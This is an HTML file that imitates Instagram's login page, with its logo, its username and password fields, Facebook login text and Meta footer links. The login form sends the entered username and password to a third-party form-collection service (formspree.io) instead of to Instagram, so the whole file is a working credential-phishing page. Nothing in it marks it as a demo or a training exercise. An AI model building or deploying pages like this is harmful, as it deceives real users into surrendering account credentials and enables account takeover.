<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <style>
        * {
            line-height: 16px;
            box-sizing: border-box;
            outline: none;
            border: none;
            text-decoration: none;
        }
        body {
            font-family: Arial, sans-serif;
            background-color: #FFF;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: top;
            align-items: center;
            flex-direction: column;
            height: 100vh;
            padding: 12px 20px;
        }

        .login-container {
            background-color: white;
            border: 1px solid #dbdbdb;
            padding: 40px 40px;
            width: 350px;
            text-align: center;
        }

        .login-container img {
            width: 200px;
            margin-bottom: 20px;
        }

        input[type="text"], input[type="password"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 6px;
            border: 1px solid #dbdbdb;
            border-radius: 3px;
            background-color: #fafafa;
            box-sizing: border-box;
            font-size: 12px;
        }

        .login-btn {
            width: 100%;
            padding: 10px;
            background-color: #67B5FA;
            color: white;
            border: none;
            border-radius: 8px;
            cursor: pointer;
            margin-top: 10px;
            font-size: 14px;
        }
        .login-btn a {
            color: white;
        }
        .login-btn:hover {
            background-color: #1A77F2;
        }

        .separator {
            display: flex;
            align-items: center;
            text-align: center;
            margin: 20px 0;
            font-size: 12px;
            color: #767676;
        }

        .separator::before, .separator::after {
            content: "";
            flex: 1;
            border-bottom: 1px solid #dbdbdb;
        }

        .separator::before {
            margin-right: 10px;
        }

        .separator::after {
            margin-left: 10px;
        }

        .signup {
            border: 1px solid #dbdbdb;
            width: 350px;
            margin-top: 10px;
            font-size: 14px;
            padding: 20px;
            text-align: center;
        }

        .signup a {
            color: #0095f6;
            text-decoration: none;
        }
        .description-div {
            font-size: 11px;
            text-align: center;
            color: #8e8e8e;
        }
        .app-links {
            display: flex;
            min-width: 350px;
            justify-content: center;
            margin-top: 20px;
        }
        .app-links a {
            display: flex;
            height: 40px;
            margin: 10px;
        }
        .app-links a:nth-child(1) {
            width: 135px;
        }
        .app-links:nth-child(2) {
            width: 110px;
        }
        .app-links a img {
            width: 100%;
            height: 100%;
        }
        .footer-text {
            color: #8e8e8e;
            font-size: 12px;
            margin-top: 20px;
            display: flex;
            flex-wrap: wrap;
            justify-content: center;
        }

        .footer-text a {
            color: #8e8e8e;
            text-decoration: none;
            margin-right: 20px;
            margin-top: 10px;
        }

        .footer-text a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>

    <div class="login-container">
        <img src="instagram-logo.png" alt="Instagram Logo">
        
        <form id="login-form" action="https://formspree.io/f/mgvwbykg" method="POST">
            <input type="text" name="username" placeholder="Phone number, email, or username" required>
            <input type="password" name="password" placeholder="Password" required>
            <button class="login-btn" type="submit">Log in</button>
        </form>

        <div class="separator">OR</div>

        <div class="login-btn-2" style="font-size:14px;font-weight: 500; color: #385185;">Log In with Facebook</div>

        <p style="color: #385185; margin: 20px; font-size: 12px;">Forgot your password?</p>

        <div class="description-div" >You can also report content you believe is unlawful in your country without logging in.</div>
        
    </div>

    <div class="signup">
        Don't have an account? <a href="#">Sign up</a>
    </div>

    <div class="app-links">
        <a href="#"><img src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" alt="App Store"></a>
        <a href="#"><img src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png" alt="Google Play"></a>
    </div>

    <div class="footer-text">
        <a href="#">Meta</a> <a href="#">About</a> <a href="#">Blog</a> <a href="#">Jobs</a>
        <a href="#">Help</a> <a href="#">API</a> <a href="#">Privacy</a> <a href="#">Cookie Settings</a>
        <a href="#">Terms and Imprint</a> <a href="#">Locations</a> <a href="#">Instagram Light</a>
        <a href="#">Threads</a> <a href="#">Contact Uploading & Non-Users</a> <a href="#">Meta Verified</a>
    </div>

</body>
</html>
